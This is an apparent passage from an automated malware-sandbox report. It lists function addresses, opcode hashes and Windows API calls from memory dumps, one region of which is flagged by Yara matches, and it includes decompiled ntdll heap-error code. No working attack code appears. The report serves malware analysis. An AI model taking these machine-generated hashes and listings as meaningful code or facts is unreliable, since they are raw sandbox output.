                                                      • Opcode Fuzzy Hash: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                                                      • Instruction Fuzzy Hash: DD90026121190043F201A5698C14B070055D7D0347F61C225A4145555CC955D8A16661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                                                      • Instruction ID: f14acf949a1c67d54b389c96bb5ebba9086f60745274fcbbdf559e14293357d0
                                                      • Opcode Fuzzy Hash: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                                                      • Instruction Fuzzy Hash: 5090027120514843F141B1598404A460065D7D0349F61C121A4055695D9665DD95B7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                                                      • Instruction ID: f477d9ea2edfdd041adb6de88183c28b4f23c9a85091530434325d78dc0c0dc0
                                                      • Opcode Fuzzy Hash: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                                                      • Instruction Fuzzy Hash: 2190027120110803F181B159840464A0055D7D1345FA1C125A4016655DCA55DA9977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                                                      • Instruction ID: 7ef0a04642cedd6e161cec63c72a95f1cb8a906a8fc53e29544facd56ca4146d
                                                      • Opcode Fuzzy Hash: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                                                      • Instruction Fuzzy Hash: D190026921310003F181B159940860A0055D7D1246FA1D525A4006559CC955D8A96361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                                                      • Instruction ID: 7cc4b2bb4ec486d5d8b0af6adca346635d971e63e0c5e4d139ede5bb177491e3
                                                      • Opcode Fuzzy Hash: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                                                      • Instruction Fuzzy Hash: B290027131124403F111A159C4047060055D7D1245F61C521A4815559D86D5D8D17262
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04949710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                                                      • Instruction ID: 7c6129550f70f8483f2c74a18a14a99c24142283ba55cdca4b535200cbcfbcf4
                                                      • Opcode Fuzzy Hash: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                                                      • Instruction Fuzzy Hash: 6E90027120110403F101A59994086460055D7E0345F61D121A9015556EC6A5D8D17271
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00843AF8), ref: 0085A08D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 82f613b7994af3a6908055570c8a49f313adc24447c3d1fef8eb6180f26820a6
                                                      • Instruction ID: 9d7b7885d5fe118a8574480331dafc6391e829e1d5d0b4a69bb5ccac18f1b332
                                                      • Opcode Fuzzy Hash: 82f613b7994af3a6908055570c8a49f313adc24447c3d1fef8eb6180f26820a6
                                                      • Instruction Fuzzy Hash: 45E06DB1210208ABD718DF58CC45EE73768EF48350F014654FD1857342C631E9008AE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00843AF8), ref: 0085A08D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: 729c9246d60971cd40841c17d9cc7c94f2e7aecf5b96a489bda96b9ade96fa4d
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: 37E01AB12002146BD718DF59CC45EA777ACEF88750F014554BD1857241C631E9148AB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008482F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0084834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0084836B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                      • Instruction ID: 46656a4d94766f300e6cf14ddcb12de4d61bb9e0e1c0c100bdd2dc01bcd2b25b
                                                      • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                      • Instruction Fuzzy Hash: DA018431A8022C7AE721AA989C43FBE766CBB40B51F044118FF04FA2C1E695690946E6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A092, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0085A124
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 288a03ff2530a140520e738f1638f9a381d855879da54e2e6db8eaea64a61b76
                                                      • Instruction ID: 72ede9c4e3274ccf8a2c53c73c569b8eb942b4b57086c9e70c5ddb02db908926
                                                      • Opcode Fuzzy Hash: 288a03ff2530a140520e738f1638f9a381d855879da54e2e6db8eaea64a61b76
                                                      • Instruction Fuzzy Hash: 200188B2200508ABCB18DF98EC85DE777ACEF8C364F018259FA4CD7241C231E810CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0085A124
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: 819613854218a4218ccf3b572e719c310437b2260a52eeb7d7c147dec89fbe8e
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 7C01AFB2210108AFCB58DF89DC81EEB77ADAF8C754F158258BA1D97241C630E851CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A23D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084F192,0084F192,?,00000000,?,?), ref: 0085A1F0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 1ec8a63fac52985cdbeb1a0be8d2bfab7ca55214096068c6a9aa0a8e304652f5
                                                      • Instruction ID: d5c140221ce492cd5c0da09c5460c65b6f6783cec07520ee36cf587cead6c9b3
                                                      • Opcode Fuzzy Hash: 1ec8a63fac52985cdbeb1a0be8d2bfab7ca55214096068c6a9aa0a8e304652f5
                                                      • Instruction Fuzzy Hash: 8CF05E75200214AFCB14EF98DC81DA777A8EF84321F018659FD5C97703C631E9148BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A129, Relevance: 1.5, APIs: 1, Instructions: 32processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0085A124
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 492d06907ce2fcac53965eacaa4a39f05f0ec476cf3d111c1eedcffdd7644d6f
                                                      • Instruction ID: 48569e93f5575bb71495708d3a54020d14651fc37efefb0853f4555f030f455f
                                                      • Opcode Fuzzy Hash: 492d06907ce2fcac53965eacaa4a39f05f0ec476cf3d111c1eedcffdd7644d6f
                                                      • Instruction Fuzzy Hash: 3BE0E5B21042522FDB14EB68AC81CE7BF5CEF84220705C6A9FC9C47103C631D814C7B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0084F687, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00848CF4,?), ref: 0084F6BB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: e7c5cca0214fc4e10e26f334a35a641d8d14f6938650dc263dd2be142885a695
                                                      • Instruction ID: 120cc1cf1cec9110cc8f8f8ab29b6c8c164c9dc18c72b871e89b7d14462bca83
                                                      • Opcode Fuzzy Hash: e7c5cca0214fc4e10e26f334a35a641d8d14f6938650dc263dd2be142885a695
                                                      • Instruction Fuzzy Hash: 96E026706542082EDB20EFB48C07FD63B4ABF61344F0A01A8FC49DB2D3E900D0118125
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(008544F6,?,00854C6F,00854C6F,?,008544F6,?,?,?,?,?,00000000,00000000,?), ref: 0085A04D
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: 2e0614029890efb474df9292d7c9afe74e3fa1a1c2c39eadc1b7950c970b46e1
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: 18E012B1200218ABDB18EF99CC81EA777ACEF88650F118558BE189B242C631F9148AB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0085A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084F192,0084F192,?,00000000,?,?), ref: 0085A1F0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: f680362a0529c22d54ef5fe6a79aaa0ecd9b9c152aa633772dc98df4bdde7031
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 23E01AB12002186BDB14DF49CC85EE737ADEF88650F018154BE1C57241C931E8148BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0084F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00848CF4,?), ref: 0084F6BB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                      • Instruction ID: b0cf0bc7dcf547274e3c24351ff7dfa28dd79257dd231fbd2f341a053322ce91
                                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                      • Instruction Fuzzy Hash: 13D0A7727903083BE710FAA89C03F2632CCBB54B54F490074FE49DB3C3D950E4004165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0494967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                                                      • Instruction ID: 4159f8e0b77cd3c2e9be92d6a93eb7d9132a987a5b3297904f12f5d3e213580b
                                                      • Opcode Fuzzy Hash: f9c914d67c801e9ecf58411f6395d0b4241e5d32e76c4210bf75ca0cd281c80c
                                                      • Instruction Fuzzy Hash: B4B09BB19425C5C6F751D7708608B177954B7D0745F26C175D1020641A4778D0D1F6B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 049BB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 049BB305
                                                      • a NULL pointer, xrefs: 049BB4E0
                                                      • This failed because of error %Ix., xrefs: 049BB446
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 049BB314
                                                      • The instruction at %p tried to %s , xrefs: 049BB4B6
                                                      • The resource is owned exclusively by thread %p, xrefs: 049BB374
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 049BB47D
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 049BB484
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 049BB2F3
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 049BB38F
                                                      • *** enter .cxr %p for the context, xrefs: 049BB50D
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 049BB2DC
                                                      • The resource is owned shared by %d threads, xrefs: 049BB37E
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 049BB48F
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 049BB3D6
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 049BB323
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 049BB476
                                                      • Go determine why that thread has not released the critical section., xrefs: 049BB3C5
                                                      • *** Inpage error in %ws:%s, xrefs: 049BB418
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 049BB39B
                                                      • The instruction at %p referenced memory at %p., xrefs: 049BB432
                                                      • *** then kb to get the faulting stack, xrefs: 049BB51C
                                                      • The critical section is owned by thread %p., xrefs: 049BB3B9
                                                      • read from, xrefs: 049BB4AD, 049BB4B2
                                                      • <unknown>, xrefs: 049BB27E, 049BB2D1, 049BB350, 049BB399, 049BB417, 049BB48E
                                                      • write to, xrefs: 049BB4A6
                                                      • an invalid address, %p, xrefs: 049BB4CF
                                                      • *** enter .exr %p for the exception record, xrefs: 049BB4F1
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 049BB53F
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 049BB352
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: e56c286693c04515dee11b6528b7618366cc36ca822b3a7f733b3b9eec522f20
                                                      • Instruction ID: 38d1225c7b9718224cd120cfd1d2b10798b3534ebcacd4e46db8106565bd322a
                                                      • Opcode Fuzzy Hash: e56c286693c04515dee11b6528b7618366cc36ca822b3a7f733b3b9eec522f20
                                                      • Instruction Fuzzy Hash: 5E816832A01200FFEB226F09CC45DBB3BABEF86765F014564F7055BA51E264B941DBB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049C1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E049C1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x48e48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0490B150();
				} else {
					E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x49f589c);
				E0490B150("Heap error detected at %p (heap handle %p)\n",  *0x49f58a0);
				_t27 =  *0x49f5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M049C1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0490B150();
				} else {
					E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0490B150("Error code: %d - %s\n",  *0x49f5898);
				_t113 =  *0x49f58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0490B150();
					} else {
						E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0490B150("Parameter1: %p\n",  *0x49f58a4);
				}
				_t115 =  *0x49f58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0490B150();
					} else {
						E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0490B150("Parameter2: %p\n",  *0x49f58a8);
				}
				_t117 =  *0x49f58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0490B150();
					} else {
						E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0490B150("Parameter3: %p\n",  *0x49f58ac);
				}
				_t119 =  *0x49f58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0490B150();
					} else {
						E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x49f58b4);
					E0490B150("Last known valid blocks: before - %p, after - %p\n",  *0x49f58b0);
				} else {
					_t120 =  *0x49f58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0490B150();
				} else {
					E0490B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0490B150("Stack trace available at %p\n", 0x49f58c0);
			}











                                                      0x049c1c10
                                                      0x049c1c16
                                                      0x049c1c1e
                                                      0x049c1c3d
                                                      0x049c1c3e
                                                      0x049c1c20
                                                      0x049c1c35
                                                      0x049c1c3a
                                                      0x049c1c44
                                                      0x049c1c55
                                                      0x049c1c5a
                                                      0x049c1c65
                                                      0x049c1c67
                                                      0x00000000
                                                      0x049c1c6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049c1c67
                                                      0x049c1cdc
                                                      0x049c1ce5
                                                      0x049c1d04
                                                      0x049c1d05
                                                      0x049c1ce7
                                                      0x049c1cfc
                                                      0x049c1d01
                                                      0x049c1d0b
                                                      0x049c1d17
                                                      0x049c1d1f
                                                      0x049c1d25
                                                      0x049c1d30
                                                      0x049c1d4f
                                                      0x049c1d50
                                                      0x049c1d32
                                                      0x049c1d47
                                                      0x049c1d4c
                                                      0x049c1d61
                                                      0x049c1d67
                                                      0x049c1d68
                                                      0x049c1d6e
                                                      0x049c1d79
                                                      0x049c1d98
                                                      0x049c1d99
                                                      0x049c1d7b
                                                      0x049c1d90
                                                      0x049c1d95
                                                      0x049c1daa
                                                      0x049c1db0
                                                      0x049c1db1
                                                      0x049c1db7
                                                      0x049c1dc2
                                                      0x049c1de1
                                                      0x049c1de2
                                                      0x049c1dc4
                                                      0x049c1dd9
                                                      0x049c1dde
                                                      0x049c1df3
                                                      0x049c1df9
                                                      0x049c1dfa
                                                      0x049c1e00
                                                      0x049c1e0a
                                                      0x049c1e13
                                                      0x049c1e32
                                                      0x049c1e33
                                                      0x049c1e15
                                                      0x049c1e2a
                                                      0x049c1e2f
                                                      0x049c1e39
                                                      0x049c1e4a
                                                      0x049c1e02
                                                      0x049c1e02
                                                      0x049c1e08
                                                      0x00000000
                                                      0x00000000
                                                      0x049c1e08
                                                      0x049c1e5b
                                                      0x049c1e7a
                                                      0x049c1e7b
                                                      0x049c1e5d
                                                      0x049c1e72
                                                      0x049c1e77
                                                      0x049c1e95

                                                      Strings
                                                      Memory Dump Source
